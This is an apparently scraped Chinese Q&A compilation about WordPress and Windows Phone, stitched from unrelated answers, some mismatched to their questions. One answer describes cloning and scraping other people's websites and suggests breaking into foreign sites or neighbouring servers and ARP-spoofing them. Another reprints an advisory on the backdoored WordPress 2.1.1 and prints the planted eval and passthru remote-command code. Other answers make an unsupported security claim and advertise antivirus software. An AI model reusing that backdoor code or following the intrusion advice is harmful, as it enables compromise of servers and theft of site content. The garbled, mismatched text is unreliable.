本文目录一览:
- 1、wp可以入侵吗,。。。?
- 2、wordpress做的网站,我想别人复制我网站的内容,但是别人点击右键复制不了怎么办?
- 3、Wordpress 2.1.1远程命令执行后门漏洞
- 4、无聊的问题,勒索病毒会入侵WP吗
wp可以入侵吗,。。。?
爱应用-Wper:【yinshuang07】 为您解答:
当然可以,但是目前还没有被入侵过,所以说他的系统最安全呀,毕竟是定位为商务的
满意请采纳,有疑问请追问,谢谢!
wordpress做的网站,我想别人复制我网站的内容,但是别人点击右键复制不了怎么办?
*** 一
1
对于一些单页面的网站,我们可以直接手工来完成,比如金山毒霸官网(,不含论坛),查看源码可以发现这个网站由html+css+js+图片构成,而且不需要数据库。
2
那么这就好办了,我们可以通过迅雷将这些css,js,html和图片文件都一一下载下来,然后将他们整理好,上传到自己的空间即可。千万不要右键”另存为“,那样容易导致编码错误,出现乱码。
END
*** 二
1
一些大型门户网站,比如百度,google, *** 等等,在全球有很多镜像,如果我们想复制他们的话,可以将自己的域名解析到这些网站的任意一个镜像上,这里以百度为例来说明下,通过nslookup可以查看到,百度解析到了61.135.169.125, 61.135.169.121这两个服务器上面。
2
接下来,我们可以将自己的域名解析到61.135.169.125或者61.135.169.121上面,就可以通过你的域名访问百度了。
END
*** 三
1
对于一些带数据库的网站,我们可以通过查看版权或者用一些目录扫描工具等来判断下目标网站所用到的程序,然后安装相应的模板,用一些插件来批量采集对方网站的内容,比如**网站,通过查看后台可以发现这个网站是由wordpress搭建的。
2
通过查看css文件,会发现这个网站用到的主题是”阿里百秀“,版本是3.2。
3
此时,我们可以在自己的空间搭建一个wordpress的网站,然后去购买”阿里百秀“的主题,安装即可,这样大致框架已经形成,接下来就是内容采集了,可以通过wp-autopost等插件来实现,非常的强大,可以采集 *** ,yaho,腾讯,新浪等等网站的内容。
END
*** 四
1
对于一些网站,我们还可以通过工具来实现,比如金山毒霸的那个网站,我们通过Teleport Pro(网站整站下载器)来批量下载目标网站的所有文件。
2
安装完Teleport Pro后,选择文件——新建项目向导——下一步——输入,下面的深度选择5——下一步——完成;
3
在弹出的窗口中选择一个需要保存的路径,保存即可,然后选择工具栏中的”开始”,就可以全自动的下载金山毒霸的程序了。
END
*** 五
如果你喜欢一些国外的网站,而一些采集插件又不好使时,可以尝试去入侵他们的网站,将目标网站整站打包,主站不好入侵的话,可以入侵C段的任意一个服务器,然后arp目标网站所在的服务器即可,出于安全考虑这里不一一阐述。
Wordpress 2.1.1远程命令执行后门漏洞
他受影响系统是:
WordPress WordPress 2.1.1
描述:
BUGTRAQ ID: 22797
WordPress是一款免费的论坛Blog系统。
WordPress提供软件下载的网站被入侵,入侵者修改了软件代码码植入远程可执行命令的后门,远程攻击者可能利用这个后门以Web进程权限在安装了恶意版本WordPress的服务器上执行任意命令。
被修改的文件是wp-includes/feed.php和wp-includes/theme.php,被添加了如下代码:
在wp-includes/feed.php文件中:
function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
eval()调用会执行通过ix变量传入的PHP代码。
在wp-includes/theme.php文件中:
function get_theme_mcommand($mcds) {
passthru($mcds);
}
...
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
passthru()会执行通过iz变量传入的PHP代码。
*来源:Ivan Fratric
链接:
*
测试 *** :
--------------------------------------------------------------------------------
提示:
以下程序( *** )可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
无聊的问题,勒索病毒会入侵WP吗
建议楼主下载安装腾讯电脑管家来进行杀毒,
重启电脑按F8进入安全模式--打开腾讯电脑管家--杀毒--全盘扫描----顽固木马克星--深化扫描--完成重启电脑就可以了
腾讯电脑管家为国内首个采用“ 4+1 ”核“芯”杀毒引擎的专业杀毒软件,
应用腾讯自研第二代反病毒引擎“鹰眼”,
资源占用少,基于CPU虚拟执行技术能够根除顽固病毒,
大幅度提升深度查杀能力。